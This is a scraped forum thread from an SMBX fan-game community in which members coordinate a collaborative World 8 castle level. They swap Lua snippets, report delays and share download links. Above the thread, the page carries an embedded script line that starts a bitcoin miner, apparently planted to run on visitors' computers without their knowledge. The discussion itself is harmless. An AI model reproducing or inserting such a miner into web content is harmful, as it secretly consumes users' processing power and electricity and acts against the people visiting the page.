<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxyirc.cat.bio

World 8 Castle/Boss Level Signups [Spoilers]

The second SMBX collab!
User avatar
Mabel
Just west of wierd
Posts: 259
Joined: 4 years ago

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby Mabel » 1 year ago

i'd like to go next whenever or something, i guess when Mech is done i guess?
Image
Image
Image Image

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

Mabel wrote:i'd like to go next whenever or something, i guess when Mech is done i guess?
Sorry for my school getting in the way. As soon as I finish my Book report (which is valued at pass or fail (graduation on the line)) I have no choice.

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

any updates on this?
Image

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

7NameSam wrote:any updates on this?
Yeah, Should be done by a week.

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

MECHDRAGON777 wrote:
7NameSam wrote:any updates on this?
Yeah, Should be done by a week.
Sorry for the double post, I may not be able to quite finish by tomorrow, but I think I can do quite a lot. I will try to make sure finish it as soon as possible.

Edit: I have 164+ lines of code in just my sections.

Edit 2: I have had no electricity all day. Sorry that this will take slightly longer now.

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

UPDATE
[/size]
My PC has crashed and I lost all files and I did not back-up my version of this level before hand. Can I either go last, or or given the download to the most up-to-date file?[/color]

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

UPDATE
[/size]

I got my PC operational, and I will continue work on my section after I finish my MaGKLX 3 level. (I am getting a lot of inspiration for it lately.[/color]

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

Hey! here's a bump!
I updated the onedrive, I made my section look better.
Image

User avatar
SAJewers
hi
Posts: 2263
Joined: 5 years ago
Location: Nova Scotia

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby SAJewers » 1 year ago

Who's next/has the level?
ImageImageImage
Image
ImageImageImageImage

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

SAJewers wrote:Who's next/has the level?
Mechdragon, in theory.
Image

User avatar
pholtos
Loves adorable things.
Posts: 1393
Joined: 8 years ago
Location: One of the States in the Center of the U.S.

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby pholtos » 1 year ago

Was my code ever added to the actual lua or is it still in that odd extra lua?
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Pokemon Gimmick Free For All Feel free to join in the fun! :3

ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:
Image

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

7NameSam wrote:Hey! here's a bump!
I updated the onedrive, I made my section look better.
Does that mean I need to redo load the level and re do every thing I have done? Also, am I allowed to use 2.0 beta 3 stuff?

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

MECHDRAGON777 wrote:
7NameSam wrote:Hey! here's a bump!
I updated the onedrive, I made my section look better.
Does that mean I need to redo load the level and re do every thing I have done? Also, am I allowed to use 2.0 beta 3 stuff?
All I did was change some graphics and add a few lines of lua code, so it shouldn't be that hard to put in.
here's what I added:

Code: Select all

local ZSNES = Graphics.loadImage("black.png");

for  k,v in pairs(Layer.find("7NameSam-spotlight"))  do
    if v.isHidden == false then
      Graphics.drawImageWP(ZSNES,0,0,6);
    end
  end
I changed NPC-223
Image

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

7NameSam wrote:
MECHDRAGON777 wrote:
7NameSam wrote:Hey! here's a bump!
I updated the onedrive, I made my section look better.
Does that mean I need to redo load the level and re do every thing I have done? Also, am I allowed to use 2.0 beta 3 stuff?
All I did was change some graphics and add a few lines of lua code, so it shouldn't be that hard to put in.
here's what I added:

Code: Select all

local ZSNES = Graphics.loadImage("black.png");

for  k,v in pairs(Layer.find("7NameSam-spotlight"))  do
    if v.isHidden == false then
      Graphics.drawImageWP(ZSNES,0,0,6);
    end
  end
I changed NPC-223
That actually is a big problem for me since NPC-223 was used in my section.

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

MECHDRAGON777 wrote:
That actually is a big problem for me since NPC-223 was used in my section.
Oh,
I can probably fix that.
Image

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

7NameSam wrote:
MECHDRAGON777 wrote:
That actually is a big problem for me since NPC-223 was used in my section.
Oh,
I can probably fix that.
Think you can send a mediafire link with your fixed stuff?

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

MECHDRAGON777 wrote:
7NameSam wrote:
MECHDRAGON777 wrote:
That actually is a big problem for me since NPC-223 was used in my section.
Oh,
I can probably fix that.
Think you can send a mediafire link with your fixed stuff?
I have fixed my section!
https://www.dropbox.com/s/73buz108mnavm ... e.rar?dl=0
I decided to use drawimagetoscene instead of an npc
it includes both the level file and the level folder, so be careful with it
Image

User avatar
MECHDRAGON777
Where radioactivity blossoms, so do I!
Posts: 415
Joined: 2 years ago
Pronouns: he/him/his
Location: Antarctica
Contact:

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby MECHDRAGON777 » 1 year ago

7NameSam wrote:
MECHDRAGON777 wrote:
7NameSam wrote: Think you can send a mediafire link with your fixed stuff?
I have fixed my section!
https://www.dropbox.com/s/73buz108mnavm ... e.rar?dl=0
I decided to use drawimagetoscene instead of an npc
it includes both the level file and the level folder, so be careful with it
I decided against rng in my section to another gimmick. Has this been updated since the last message.

Image
Image
My avartar
Image




I am a SMBX player, and I do not know weather to stay at SuperMarioBrosx.org or at talkhaus.raocow.com honestly.

User avatar
7NameSam
hey
Posts: 221
Joined: 2 years ago
Pronouns: he/him/his

Re: World 8 Castle/Boss Level Signups [Spoilers]

Postby 7NameSam » 1 year ago

MECHDRAGON777 wrote: I decided against rng in my section to another gimmick. Has this been updated since the last message.
nah, I think this whole shebang has been put on hold until a2xt gets ported to smbx2.0
Image


Return to “A2XT”

Who is online

Users browsing this forum: No registered users and 2 guests

cron